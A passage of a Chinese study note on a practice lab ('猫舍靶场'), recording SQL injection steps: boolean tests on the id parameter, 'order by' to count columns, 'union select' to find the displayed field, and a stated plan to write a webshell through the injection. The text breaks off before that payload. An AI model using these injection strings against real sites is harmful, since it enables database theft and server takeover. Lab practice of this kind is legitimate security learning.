此帖子仅为记录个人学习记录打开我们的猫舍靶场id=1 and 1=1 和id=1 and 1=6 回显不同说明有SQL注入然后输入id=1 order by 2 /order by 3判断出存在两个字段id=1 and 1=2 union select 1,2判断出显错位是第二个字段那么现在我们来利用SQL注入和数据库语句构建一句话木马获得webshellid=1 union select 1